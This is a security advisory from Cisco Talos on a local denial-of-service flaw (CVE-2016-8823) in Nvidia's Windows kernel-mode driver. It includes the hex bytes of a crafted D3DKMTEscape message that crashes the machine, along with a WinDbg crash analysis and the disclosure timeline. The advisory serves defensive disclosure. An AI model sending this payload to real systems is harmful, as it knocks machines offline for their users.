Talos Vulnerability Report

TALOS-2016-0217

Nvidia Windows Kernel Mode Driver Denial Of Service

December 14, 2016
CVE Number

CVE-2016-8823

Summary

An local denial of service vulnerability exists in the communication functionality of Nvidia Windows Kernel Mode Driver. A specially crafted message can cause a vulnerability resulting in a machine crash (BSOD). An attacker can send a specific message to trigger this vulnerability.

Tested Versions

(Requires physical machine)
- Nvidia Windows Kernel Mode Driver, 372.70 (21.21.13.7270)
- Nvidia Windows Kernel Mode Driver, 372.90 (21.21.13.7290)

Product URLs

http://nvidia.com

CVSSv3 Score

5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Details

An local denial of service vulnerability exists in the communication functionality of Nvidia Windows Kernel Mode Driver. A specially crafted D3DKMTEscape message can cause a vulnerability resulting in a machine crash (BSOD). An attacker can send a specific message to trigger this vulnerability.

0x41, 0x44, 0x56, 0x4E, 0x02, 0x00, 0x01, 0x00, 0x40, 0x01, 0x00, 0x00, 0x2A, 0x2A, 0x56, 0x4E,
0x03, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x4E, 0x00, 0x56, 0x00, 0x53, 0x00, 0x50, 0x00,
0x43, 0x00, 0x41, 0x00, 0x50, 0x00, 0x53, 0x00, 0x5C, 0x00, 0x61, 0x00, 0x61, 0x00, 0x31, 0x00,
0x38, 0x00, 0x65, 0x00, 0x62, 0x00, 0x63, 0x00, 0x34, 0x00, 0x2D, 0x00, 0x30, 0x00, 0x31, 0x00,
0x39, 0x00, 0x64, 0x00, 0x2D, 0x00, 0x34, 0x00, 0x65, 0x00, 0x63, 0x00, 0x30, 0x00, 0x2D, 0x00,
0x62, 0x00, 0x66, 0x00, 0x31, 0x00, 0x64, 0x00, 0x2D, 0x00, 0x64, 0x00, 0x36, 0x00, 0x33, 0x00,
0x30, 0x00, 0x30, 0x00, 0x32, 0x00, 0x31, 0x00, 0x38, 0x00, 0x62, 0x00, 0x66, 0x00, 0x35, 0x00,
0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x9F, 0x21, 0x93, 0x00, 0x32, 0xE1, 0x54, 0x00, 0x00, 0x80, 0x84, 0x1E, 0x00

This bug happens because the ZwSetValueKey API is executed by the Nvidia driver with an invalid argument.

Crash Information

0: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ffffd00026a46000, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff801b0bcfc20, If non-zero, the instruction address which referenced the bad memory
    address.
Arg4: 0000000000000000, (reserved)

Debugging Details:
------------------


READ_ADDRESS:  ffffd00026a46000

FAULTING_IP:
nt!memcpy+a0
fffff801`b0bcfc20 f30f6f040a      movdqu  xmm0,xmmword ptr [rdx+rcx]

MM_INTERNAL_CODE:  0

DEFAULT_BUCKET_ID:  WIN8_DRIVER_FAULT

BUGCHECK_STR:  AV

PROCESS_NAME:  intel1.exe

CURRENT_IRQL:  0

ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) amd64fre

TRAP_FRAME:  ffffd00026a44670 -- (.trap 0xffffd00026a44670)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=ffffc001f8688670
rdx=00000ffe2e3bd988 rsi=0000000000000000 rdi=0000000000000000
rip=fffff801b0bcfc20 rsp=ffffd00026a44808 rbp=00000000000054e1
 r8=000000000000000c  r9=00000000000001cc r10=ffffe00152d2ae68
r11=ffffc001f8688024 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
nt!memcpy+0xa0:
fffff801`b0bcfc20 f30f6f040a      movdqu  xmm0,xmmword ptr [rdx+rcx] ds:ffffd000`26a45ff8=????????????????????????????????
Resetting default scope

LAST_CONTROL_TRANSFER:  from fffff801b0bde42c to fffff801b0bc33a0

STACK_TEXT:
ffffd000`26a44408 fffff801`b0bde42c : 00000000`00000050 ffffd000`26a46000 00000000`00000000 ffffd000`26a44670 : nt!KeBugCheckEx
ffffd000`26a44410 fffff801`b0af2d09 : 00000000`00000000 ffffe001`5c91b080 ffffd000`26a44670 00000000`00000000 : nt! ?? ::FNODOBFM::`string'+0xab6c
ffffd000`26a444b0 fffff801`b0bcd62f : 00000000`00000000 ffffc001`f008dfc4 00000000`00000000 00000000`00000000 : nt!MmAccessFault+0x769
ffffd000`26a44670 fffff801`b0bcfc20 : fffff801`b0f26473 ffffe001`5d517301 ffffc001`00000006 ffffc001`f008dfc4 : nt!KiPageFault+0x12f
ffffd000`26a44808 fffff801`b0f26473 : ffffe001`5d517301 ffffc001`00000006 ffffc001`f008dfc4 ffffd000`26a44860 : nt!memcpy+0xa0
ffffd000`26a44810 fffff801`b0fbcd18 : ffffc001`f8688024 00000000`00000000 00000000`001e8480 ffffc001`ee828000 : nt!CmpSetValueDataNew+0x157
ffffd000`26a44860 fffff801`b0f0f588 : 01d21329`ff575fe0 ffffd000`26a44991 ffffc001`f170fa70 00000025`00000003 : nt! ?? ::NNGAKEGL::`string'+0x27928
ffffd000`26a448d0 fffff801`b0e3a977 : ffffc001`f7837b50 ffffd000`26a44a40 ffffc001`00000003 ffffd000`26a459ac : nt!CmSetValueKey+0x784
ffffd000`26a449e0 fffff801`b0bcebb3 : ffffc001`ee8763a0 ffffd000`26a44c40 00000000`00000000 fffff801`b0e9bc1e : nt!NtSetValueKey+0x55f
ffffd000`26a44bb0 fffff801`b0bc7020 : fffff801`4175a51a 00000000`000054e1 ffffd000`26a44e31 ffffd000`26a459ac : nt!KiSystemServiceCopyEnd+0x13
ffffd000`26a44db8 fffff801`4175a51a : 00000000`000054e1 ffffd000`26a44e31 ffffd000`26a459ac 00000000`000054e1 : nt!KiServiceLinkage
ffffd000`26a44dc0 fffff801`4175a051 : 00000000`000054e1 ffffd000`26a459ac 00000000`000054e1 00000000`000054e1 : nvlddmkm+0xb751a
ffffd000`26a44e80 fffff801`417944e7 : fffff801`41759fc0 ffffd000`26a45870 ffffd000`26a450b0 00000000`00000140 : nvlddmkm+0xb7051
ffffd000`26a44f20 fffff801`41763faf : 00000000`00000000 fffff801`b0dc97e0 ffffe001`52d2a080 ffffc001`ee803000 : nvlddmkm+0xf14e7
ffffd000`26a44f70 fffff801`41f44769 : ffffd000`26a45508 ffffd000`26a450b0 ffffd000`26a45870 00000000`00000000 : nvlddmkm+0xc0faf
ffffd000`26a44fb0 fffff801`41f39e24 : ffffd000`26a45448 ffffd000`26a45658 ffffe001`5d517080 fffff801`b0bcebb3 : nvlddmkm!nvDumpConfig+0x1253a1
ffffd000`26a45410 fffff801`41f44136 : ffffe001`5665a000 ffffd000`26a45519 00000000`00000000 ffffe001`56a96000 : nvlddmkm!nvDumpConfig+0x11aa5c
ffffd000`26a45450 fffff801`41efb43d : ffffd000`26a45780 ffffd000`26a455e9 ffffd000`26a45780 ffffe001`5665a000 : nvlddmkm!nvDumpConfig+0x124d6e
ffffd000`26a45580 fffff801`413604f8 : 00000000`00000002 ffffe001`5c825220 00000000`4e562a2a 00000000`01000003 : nvlddmkm!nvDumpConfig+0xdc075
ffffd000`26a45650 fffff801`413c5b4e : 00000000`00000000 ffffd000`26a45b80 ffffd000`26a45ad0 fffff801`41463b98 : dxgkrnl!DXGADAPTER::DdiEscape+0x48
ffffd000`26a45680 fffff960`002d41d3 : ffffe001`5a294010 ffffe001`5d517080 00000000`7f82f000 ffffe001`5a294010 : dxgkrnl!DxgkEscape+0x802
ffffd000`26a45ab0 fffff801`b0bcebb3 : ffffe001`5d517080 00000000`7f82d000 00000000`0013fdb0 00000000`00000000 : win32k!NtGdiDdDDIEscape+0x53
ffffd000`26a45b00 00000000`773d74aa : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13
00000000`0013dfd8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x773d74aa


STACK_COMMAND:  kb

FOLLOWUP_IP:
nvlddmkm+b751a
fffff801`4175a51a 85c0            test    eax,eax

SYMBOL_STACK_INDEX:  b

SYMBOL_NAME:  nvlddmkm+b751a

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: nvlddmkm

IMAGE_NAME:  nvlddmkm.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  57bf5593

FAILURE_BUCKET_ID:  AV_nvlddmkm+b751a

BUCKET_ID:  AV_nvlddmkm+b751a

ANALYSIS_SOURCE:  KM

FAILURE_ID_HASH_STRING:  km:av_nvlddmkm+b751a

FAILURE_ID_HASH:  {4bb56d14-bad0-e413-eed6-722441b0442f}

Followup: MachineOwner
---------

Timeline

2016-09-30 - Initial Discovery
2016-10-17 - Vendor Notification
2016-12-14 - Public Disclosure

Credit

Discovered by Piotr Bania of Cisco Talos.